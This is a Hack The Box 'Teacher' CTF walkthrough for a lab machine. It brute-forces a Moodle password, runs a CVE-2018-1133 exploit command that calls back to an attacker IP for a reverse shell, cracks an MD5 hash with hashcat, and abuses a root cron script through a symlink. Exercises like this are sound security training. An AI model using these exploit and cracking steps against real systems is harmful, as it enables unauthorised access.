/var/log $ cat "Hack The Box - Teacher Walkthrough"
2019-04-20 | hackthebox ctf
- Find partial credentials in a file named as image.
- Find the login form where those credentials can be used.
- Confirm the username.
- Burteforce the last character of the password.
- Find an exploit to get a reverse shell.
- Extract linux user password hash from SQL database.
- Crack the hash to get access to the user flag.
- Find a script being executed as root.
- Abuse the script to get the root flag.
Tools used: masscan, nmap, gobuster, crunch, burp, mysql, hashcat, pspy
Searching for open ports with
masscan just shows port 80 open. Scanning it with
nmap gives us not much more information:
As there’s only port 80 open, that is the only point to start. And this is what we find there:
When looking through the website we find something odd on the ‘Gallery’ site. A console output:
Viewing the source of
Trying to open the image in the browser isn’t possible. But it’s there. Using
curl to get it gives us something very useful:
Now we know that there is a ‘Giovanni’ who has the password ‘Th4C00lTheachaX’. But he forgot what X was. So next we need to find a place where we can use this information.
gobuster run we find the following directories:
/js gives us listings of of the files used for the website.
/server-staus aren’t directly accessible. This leaves
/moodle to explorer. And indeed there is another website:
Moodle is aa open-source learning management platform. You can find it here. Let’s see if we can confirm that ‘giovanni’ is a valid username by using the ‘Forgotten password’ function. First by trying one that will be definitely false:
The developers have thought about the possible misuse of that kind of function and only providing a very generic message to prevent username enumeration:
Trying ‘giovanni’ anyway leads to something unexpected:
Following the provided link for more information reveals an interesting fact: “This error is shown when the server fails to send the email to the requested email id containing details about how to reset the password. This is most likely a server issue.” So we can assume the username ‘giovanni’ is indeed valid.
Bruteforcing Giovanni’s Password
As we nearly know the complete password, bruteforcing the last missing character shouldn’t be to much of an effort. Therefore we create a custom password wordlist appending all printable characters to ‘Th4C00lTheacha’ (e.g. with
crunch). Then we use Burb Intruder (Sniper attack) and set the payload to our custom wordlist and let it run. As it turns out there is all kind of different output but one sticks out:
So let’s confirm that ‘Th4C00lTheacha#’ is the password for ‘giovanni’ by logging in:
Finding a Vulnerability and Exploitation
Giovanni does give th course ‘Algebra’ and apperently he want’s to do a quiz with his class tomorrow as he wrote a message to the admin:
Taking this as a hint while searching for possible vulnerabilities we find CVE-2018-1133. Moodle prior to 3.5.0 does have a RCE vulnerability in the quiz component for math formulas. Details about it can be found in Robin Peraglie’s post Evil Teacher: Code Injection in Moodle. And there’s also a working exploit titled Moodle v3.4.1 RCE Exploit from Darryn Ten available.
Let’s give it a shot and see if it works. For the exploit we need a valid course id. The id of ‘Algebra’ is 2. We start a listener and run the exploit with the command
php moodleexploit.php url=http://10.10.10.153/moodle user=Giovanni pass=Th4C00lTheacha# ip=10.10.15.146 port=42424 course=2 and if everything goes well we have a shell:
Privilege Escalation to User Flag
Unfortunately ‘www-data’ has no permission for
/home/giovanni. This means we need to get the Linux password for user ‘giovanni’ (or root) to get to the user flag.
From the file
/var/www/html/moodle/config.php we can find the credentials for the MariaDB database:
Using the MaraiDB CLI tool
mysql to enumerate the contents of the database ‘moodle’ we can find a suspicious user (id = 1337) named ‘Giovannibak’:
hash-identifier guesses that
7a860966115182402ed06375cf0a22af is most likely a MD5 hash:
Cracking the hash using
hashcat -m 0 -a 0 -o giovannibak.txt giovannibak.hash /usr/share/wordlists/rockyou.txt we get
After spawning an interactive shell we can
su giovanni using the password
expelled and get the user flag:
When observing what is going on in
/home/giovanni/work/tmp we see an archive created and the permissions change every minute. Using
pspy we find the script therefore (
/usr/bin/backup.sh) which is executed as root:
To obtain the root flag we simply create a symbolic link in
ln -s /root/root.txt toor.txt and wait for the script to be executed. Then we have the flag in /home/giovanni/work/tmp/courses/toor.txt: